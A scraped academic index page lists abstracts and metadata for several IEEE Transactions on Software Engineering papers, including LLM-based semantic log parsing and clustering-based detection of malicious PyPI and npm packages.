{"title":"SemanticLog: Towards Effective and Efficient Large-Scale Semantic Log Parsing","authors":"Chenbo Zhang;Wenying Xu;Jinbu Liu;Lu Zhang;Guiyang Liu;Jihong Guan;Qi Zhou;Shuigeng Zhou","doi":"10.1109/TSE.2025.3625121","DOIUrl":"10.1109/TSE.2025.3625121","url":null,"abstract":"Logs of large-scale cloud systems record diverse system events, ranging from routine statuses to critical errors. As the fundamental step of automated log analysis, log parsing is to transform unstructured logs into structured data for easier management and analysis. However, existing syntax-based and deep learning-based parsers struggle with complex real-world logs. Recent parsers based on large language models (LLMs) achieve higher accuracy, but they typically rely on online APIs (e.g., ChatGPT), raising privacy concerns and suffering from network latency. Moreover, with the rise of artificial intelligence for IT operations (AIOps), traditional parsers that focus on syntax-level templates fail to capture the semantics of dynamic log parameters, limiting their usefulness for downstream tasks. These challenges highlight the need for semantic log parsing that goes beyond template extraction to understand parameter semantics. This paper presents <bold>SemanticLog</b>, an effective and efficient semantic log parser powered by open-source LLMs. SemanticLog adapts the structure of LLMs to the log parsing task, leveraging their rich knowledge while safeguarding log data privacy. It first extracts informative feature representations from log data, then refines them through fine-grained semantic perception to enable accurate template and parameter extraction together with semantic category prediction. To boost scalability, SemanticLog introduces the EffiParsing tree for faster inference on large-scale logs. Extensive experiments on the LogHub-2.0 dataset show that SemanticLog significantly outperforms the state-of-the-art log parsers in terms of accuracy. Moreover, it also surpasses existing LLM-based parsers in efficiency while showcasing advanced semantic parsing capability. Notably, SemanticLog employs much smaller open-source LLMs compared to existing LLM-based parsers (mainly based on ChatGPT), while maintaining better capability of log data privacy protection.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"155-170"},"PeriodicalIF":5.6,"publicationDate":"2025-10-24","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145381322","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 0
Contrasting the Hyperparameter Tuning Impact Across Software Defect Prediction Scenarios 跨软件缺陷预测场景的超参数调优影响对比
IF 7.4 1区 计算机科学 Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING Pub Date : 2025-10-23 DOI: 10.1109/tse.2025.3624631
Mohamed Sami Rakha, Andriy Miranskyy, Daniel Alencar da Costa
{"title":"Contrasting the Hyperparameter Tuning Impact Across Software Defect Prediction Scenarios","authors":"Mohamed Sami Rakha, Andriy Miranskyy, Daniel Alencar da Costa","doi":"10.1109/tse.2025.3624631","DOIUrl":"https://doi.org/10.1109/tse.2025.3624631","url":null,"abstract":"","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"63 1","pages":""},"PeriodicalIF":7.4,"publicationDate":"2025-10-23","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145397747","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 0
Detecting Malicious Packages in PyPI and NPM by Clustering Installation Scripts 通过集群安装脚本检测PyPI和npm中的恶意包
IF 5.6 1区 计算机科学 Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING Pub Date : 2025-10-23 DOI: 10.1109/TSE.2025.3618952
Wentao Liang;Xiang Ling;Chen Zhao;Jingzheng Wu;Tianyue Luo;Yanjun Wu
Software repositories such as PyPI and npm are vital for software development but expose users to serious security risks from malicious packages. The malicious packages often execute their payloads immediately upon installation, leading to rapid system compromise. Existing detection methods are heavily dependent on difficult-to-obtain explicit knowledge, rendering them susceptible to overlooking emergent malicious packages. In this paper, we present a lightweight and effective method, namely EMPHunter, to detect malicious packages without requiring any explicit prior knowledge. EMPHunter is founded upon two fundamental and insightful observations. First, malicious packages are considerably rarer than benign ones, and second, the functionality of installation scripts for malicious packages diverges significantly from those of benign packages, with the latter frequently forming clusters. Consequently, EMPHunter utilizes the clustering technique to group the unique installation scripts of new-uploaded packages and identifies outliers as candidate malicious packages. It then ranks the outliers according to their deviate degrees and the distance between each of them and known malicious instances, effectively highlighting potential malicious packages. With EMPHunter, we successfully identified 122 previously unknown malicious packages from a pool of 267,009 newly-uploaded PyPI and npm packages, achieving an mAP (Mean Average Precision) of 0.813 and an exceptional recall of 0.992 when auditing the top-10 rankings. All detected packages have been officially confirmed as genuine malicious package by PyPI and npm. We assert that EMPHunter offers a valuable and advantageous supplement to existing detection tools, augmenting the arsenal of software supply chain security analysis.
诸如PyPI和npm之类的软件存储库对于软件开发至关重要,但也会使用户面临恶意软件包带来的严重安全风险。恶意软件包通常在安装后立即执行其有效载荷,导致系统迅速受到危害。现有的检测方法严重依赖于难以获得的显式知识,使其容易忽略突发的恶意软件包。在本文中,我们提出了一种轻量级和有效的方法,即empunter,来检测恶意包,而不需要任何明确的先验知识。empounter是建立在两个基本和深刻的观察之上的。首先,恶意软件包比良性软件包少得多,其次,恶意软件包的安装脚本的功能与良性软件包的安装脚本有很大的不同,后者经常形成集群。因此,empunter利用聚类技术对新上传的软件包的唯一安装脚本进行分组,并将异常值识别为候选恶意软件包。然后,它根据异常值的偏离程度以及每个异常值与已知恶意实例之间的距离对异常值进行排序,有效地突出潜在的恶意包。使用empunter,我们成功地从267,009个新上传的PyPI和npm包池中识别出122个以前未知的恶意包,在审计前10名排名时,mAP(平均精度)达到0.813,召回率达到0.992。所有检测到的软件包都被PyPI和npm正式确认为真正的恶意软件包。我们断言,empunter为现有检测工具提供了有价值和有利的补充,增加了软件供应链安全分析的武器库。
{"title":"Detecting Malicious Packages in PyPI and NPM by Clustering Installation Scripts","authors":"Wentao Liang;Xiang Ling;Chen Zhao;Jingzheng Wu;Tianyue Luo;Yanjun Wu","doi":"10.1109/TSE.2025.3618952","DOIUrl":"10.1109/TSE.2025.3618952","url":null,"abstract":"Software repositories such as PyPI and npm are vital for software development but expose users to serious security risks from malicious packages. The malicious packages often execute their payloads immediately upon installation, leading to rapid system compromise. Existing detection methods are heavily dependent on difficult-to-obtain explicit knowledge, rendering them susceptible to overlooking emergent malicious packages. In this paper, we present a lightweight and effective method, namely EMPHunter, to detect malicious packages without requiring any explicit prior knowledge. EMPHunter is founded upon two fundamental and insightful observations. First, malicious packages are considerably rarer than benign ones, and second, the functionality of installation scripts for malicious packages diverges significantly from those of benign packages, with the latter frequently forming clusters. Consequently, EMPHunter utilizes the clustering technique to group the unique installation scripts of new-uploaded packages and identifies outliers as candidate malicious packages. It then ranks the outliers according to their deviate degrees and the distance between each of them and known malicious instances, effectively highlighting potential malicious packages. With EMPHunter, we successfully identified 122 previously unknown malicious packages from a pool of 267,009 newly-uploaded PyPI and npm packages, achieving an mAP (Mean Average Precision) of 0.813 and an exceptional recall of 0.992 when auditing the top-10 rankings. All detected packages have been officially confirmed as genuine malicious package by PyPI and npm. We assert that EMPHunter offers a valuable and advantageous supplement to existing detection tools, augmenting the arsenal of software supply chain security analysis.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"36-53"},"PeriodicalIF":5.6,"publicationDate":"2025-10-23","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145397750","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 0
Unadmitted Technical Debt: Dataset and Detection Approaches 未承认的技术债务:数据集和检测方法
IF 7.4 1区 计算机科学 Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING Pub Date : 2025-10-20 DOI: 10.1109/tse.2025.3623644
Dongjin Yu, Yihang Xu, Xin Chen, Quanxin Yang, Sixuan Wang
{"title":"Unadmitted Technical Debt: Dataset and Detection Approaches","authors":"Dongjin Yu, Yihang Xu, Xin Chen, Quanxin Yang, Sixuan Wang","doi":"10.1109/tse.2025.3623644","DOIUrl":"https://doi.org/10.1109/tse.2025.3623644","url":null,"abstract":"","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"55 1","pages":""},"PeriodicalIF":7.4,"publicationDate":"2025-10-20","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145397874","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 0
期刊
IEEE Transactions on Software Engineering
全部 Acc. Chem. Res. ACS Applied Bio Materials ACS Appl. Electron. Mater. ACS Appl. Energy Mater. ACS Appl. Mater. Interfaces ACS Appl. Nano Mater. ACS Appl. Polym. Mater. ACS BIOMATER-SCI ENG ACS Catal. ACS Cent. Sci. ACS Chem. Biol. ACS Chemical Health & Safety ACS Chem. Neurosci. ACS Comb. Sci. ACS Earth Space Chem. ACS Energy Lett. ACS Infect. Dis. ACS Macro Lett. ACS Mater. Lett. ACS Med. Chem. Lett. ACS Nano ACS Omega ACS Photonics ACS Sens. ACS Sustainable Chem. Eng. ACS Synth. Biol. Anal. Chem. BIOCHEMISTRY-US Bioconjugate Chem. BIOMACROMOLECULES Chem. Res. Toxicol. Chem. Rev. Chem. Mater. CRYST GROWTH DES ENERG FUEL Environ. Sci. Technol. Environ. Sci. Technol. Lett. Eur. J. Inorg. Chem. IND ENG CHEM RES Inorg. Chem. J. Agric. Food. Chem. J. Chem. Eng. Data J. Chem. Educ. J. Chem. Inf. Model. J. Chem. Theory Comput. J. Med. Chem. J. Nat. Prod. J PROTEOME RES J. Am. Chem. Soc. LANGMUIR MACROMOLECULES Mol. Pharmaceutics Nano Lett. Org. Lett. ORG PROCESS RES DEV ORGANOMETALLICS J. Org. Chem. J. Phys. Chem. J. Phys. Chem. A J. Phys. Chem. B J. Phys. Chem. C J. Phys. Chem. Lett. Analyst Anal. Methods Biomater. Sci. Catal. Sci. Technol. Chem. Commun. Chem. Soc. Rev. CHEM EDUC RES PRACT CRYSTENGCOMM Dalton Trans. Energy Environ. Sci. ENVIRON SCI-NANO ENVIRON SCI-PROC IMP ENVIRON SCI-WAT RES Faraday Discuss. Food Funct. Green Chem. Inorg. Chem. Front. Integr. Biol. J. Anal. At. Spectrom. J. Mater. Chem. A J. Mater. Chem. B J. Mater. Chem. C Lab Chip Mater. Chem. Front. Mater. Horiz. MEDCHEMCOMM Metallomics Mol. Biosyst. Mol. Syst. Des. Eng. Nanoscale Nanoscale Horiz. Nat. Prod. Rep. New J. Chem. Org. Biomol. Chem. Org. Chem. Front. PHOTOCH PHOTOBIO SCI PCCP Polym. Chem.
×
引用
GB/T 7714-2015
复制
MLA
复制
APA
复制
导出至
BibTeX EndNote RefMan NoteFirst NoteExpress
×
0
微信
客服QQ
Book学术公众号 扫码关注我们
反馈
×
意见反馈
请填写您的意见或建议
请填写您的手机或邮箱
×
提示
您的信息不完整,为了账户安全,请先补充。
现在去补充
×
提示
您因"违规操作"
具体请查看互助需知
我知道了
×
提示
现在去查看 取消
×
提示
确定
Book学术官方微信
Book学术文献互助
Book学术文献互助群
群 号:604180095
Book学术
文献互助 智能选刊 最新文献 互助须知 联系我们:info@booksci.cn
Book学术提供免费学术资源搜索服务,方便国内外学者检索中英文文献。致力于提供最便捷和优质的服务体验。
Copyright © 2023 Book学术 All rights reserved.
ghs 京公网安备 11010802042870号 京ICP备2023020795号-1